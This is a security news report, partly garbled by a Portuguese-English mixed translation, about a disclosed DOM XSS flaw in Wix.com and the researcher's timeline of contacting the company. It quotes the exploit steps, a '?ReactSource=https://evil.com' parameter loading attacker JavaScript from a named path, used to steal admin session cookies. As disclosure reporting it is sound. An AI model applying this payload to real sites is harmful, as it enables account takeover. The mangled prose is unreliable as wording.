Você já ouviu falar de wix(.)com?
Wix.com é uma plataforma de desenvolvimento web baseada em nuvem projetado para os usuários para sites em HTML5 e sites móveis através do uso de ferramentas on-line de arrastar e soltar da empresa.
Infelizmente, a serious XSS bug has been discovered on the platform currently endangering millions of websites and users.
Wix(.)com has a serious XSS bug, researcher says
Conforme relatado por pesquisadores de segurança, the service hosts millions of websites with 87 milhões de usuários registrados. The scary part is that all users are currently prone to this XSS vulnerability. The latter can be deployed by attackers in a worm-like manner to take over administrator accounts. Uma vez feito isso, the attackers obtain full control over the compromised websites.
The XSS vulnerability was disclosed by Matt Austin from Contrast Security. Ele escrevi:
Wix.com has a severe DOM XSS vulnerability that allows an attacker complete control over any website hosted at Wix. Simply by adding a single parameter to any site created on Wix, the attacker can cause their JavaScript to be loaded and run as part of the target website.
A simple line of code is enough to trigger the bug
The attack can be triggered only by adding a simple redirection command to any URL from wix(.)com. The result is being redirected to malicious JavaScrip. See an example below:
- Adicionar: ?ReactSource=https://evil.com to any URL for any site created on wix.com.
- Make sure evil.com hosts a malicious file at /packages-bin/wixCodeInit/wixCodeInit.min.js
These simple lines of codes are enough for the attackers to be sure that their JS is loaded and activated as part of the targeted website, the researcher explains. Attackers are also able to gain access to admin session cookies and resources, a very bad scenario indeed. Whenever a session cookie is harvested, attackers can freely position the DOM XSS in an iframe. This is done to host malicious content on any website administered by an operator.
Upon success, this attack can be leveraged for malware distribution, website modification, mineração criptomoeda, altering account credentials, etc.
What did Wix say?
As for the communication with wix(.)com, the researcher shares the following experience:
outubro 10: Creates Support ticket requesting security contact
outubro 11: Reach out to @wix on twitter to find a security contact. Replied to use standard support. Gave details in created ticket. Ticket page no longer works. https://www.wix.com/support/html5/contact.
outubro 14: Received standard “We are investigating the matter and will follow up as soon as possible” reply from Wix.
outubro 20: Reply to ticket requesting an update. (no response)
outubro 27: Second request for an update. (no response)
Em outubro 28, the researcher finally received a respond which stated that the
group you tried to contact (segurança) may not exist, or you may not have permission to post messages to the group.
Não obstante, the CEO of Wix Avishai Abrahami eventually admitted that certain aspects of the platform are based on the WordPress open-source library. He claims that whatever was improved upon was released back to the community, relatórios ZDNet.